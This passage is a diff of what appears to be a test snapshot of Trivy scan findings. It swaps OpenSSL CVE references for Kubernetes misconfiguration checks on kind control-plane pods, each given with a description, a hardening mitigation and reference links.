"URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0001", + ], + }, + "category": "Misconfiguration", + "description": "Disable anonymous requests to the API server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set '--anonymous-auth' to 'false'.", + "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://avd.aquasec.com/misconfig/kcv0001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0006", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0006", + ], + }, + "category": "Misconfiguration", + "description": "Verify kubelet's certificate before establishing connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", + "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://avd.aquasec.com/misconfig/kcv0006", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0010", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0010", + ], + }, + "category": "Misconfiguration", + "description": "Limit the rate at which the API server accepts requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", + "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://avd.aquasec.com/misconfig/kcv0010", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV0012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/ksv0012", + ], + }, + "category": "Misconfiguration", + "description": "Always pull images.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", + "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/misconfig/ksv0012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0013", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0013", + ], + }, + "category": "Misconfiguration", + "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", + "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://avd.aquasec.com/misconfig/kcv0013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0018", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://avd.aquasec.com/misconfig/kcv0018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0019", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0019", + ], + }, + "category": "Misconfiguration", + "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", + "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://avd.aquasec.com/misconfig/kcv0019", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0020", + ], + }, + "category": "Misconfiguration", + "description": "Retain the logs for at least 30 days or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", + "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://avd.aquasec.com/misconfig/kcv0020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0021", + ], + }, + "category": "Misconfiguration", + "description": "Retain 10 or an appropriate number of old log files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", + "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://avd.aquasec.com/misconfig/kcv0021", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0022", + ], + }, + "category": "Misconfiguration", + "description": "Rotate log files on reaching 100 MB or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", + "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/misconfig/kcv0022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0033", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0033", + ], + }, + "category": "Misconfiguration", + "description": "Activate garbage collector on pod termination, as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", + "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "https://avd.aquasec.com/misconfig/kcv0033", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0034", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0034", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://avd.aquasec.com/misconfig/kcv0034", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0038", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0038", + ], + }, + "category": "Misconfiguration", + "description": "Enable kubelet server certificate rotation on controller-manager.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", + "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/kcv0038", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - 